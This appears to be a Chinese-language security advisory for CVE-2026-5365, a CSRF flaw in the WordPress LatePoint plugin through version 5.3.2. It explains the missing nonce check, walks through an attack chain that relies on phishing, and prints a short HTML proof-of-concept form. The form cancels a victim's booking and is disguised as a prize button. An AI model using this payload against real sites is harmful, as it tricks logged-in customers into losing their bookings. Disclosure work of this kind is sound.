CVE-2026-5365 CVSS 4.3 中危

CVE-2026-5365 WordPress LatePoint插件CSRF漏洞

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5365

漏洞类型

跨站请求伪造(CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WordPress LatePoint Plugin

漏洞概述

WordPress LatePoint插件在5.3.2及之前版本存在CSRF漏洞。由于`request_cancellation()`函数缺少nonce验证，未经身份验证的攻击者可诱导已登录客户点击恶意链接，从而取消其预定。

技术细节

该漏洞源于WordPress LatePoint插件中的`request_cancellation()`函数未对请求执行nonce（一次性数字令牌）验证。攻击者可以构造一个恶意的HTML页面或链接，诱导已登录的客户访问。由于浏览器会自动携带目标网站的Cookie，服务器在收到请求时无法区分请求来源的合法性，从而执行取消预定的操作。

攻击链分析

STEP 1

侦察

攻击者识别出目标网站使用了存在漏洞的LatePoint插件（版本<=5.3.2）。

STEP 2

构造攻击载荷

攻击者制作一个包含恶意HTML表单的页面，该表单指向取消预定的API接口，并预设了取消参数。

STEP 3

投递

攻击者通过钓鱼邮件或社交媒体将恶意链接发送给已登录的受害者。

STEP 4

利用

受害者点击链接，浏览器自动发送包含认证Cookie的请求到服务器。

STEP 5

影响

服务器接收请求并执行取消预定操作，导致受害者业务损失。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2026-5365 -->
<html>
  <body>
    <!-- Victim clicks this button -->
    <form action="http://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="latepoint_cancel_booking" />
      <input type="hidden" name="booking_id" value="123" />
      <input type="submit" value="Click to Claim Prize" />
    </form>
  </body>
</html>

影响范围

LatePoint <= 5.3.2

防御指南

临时缓解措施

在未更新插件之前，建议用户不要在登录状态下访问不可信的第三方链接，并定期检查预定状态。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表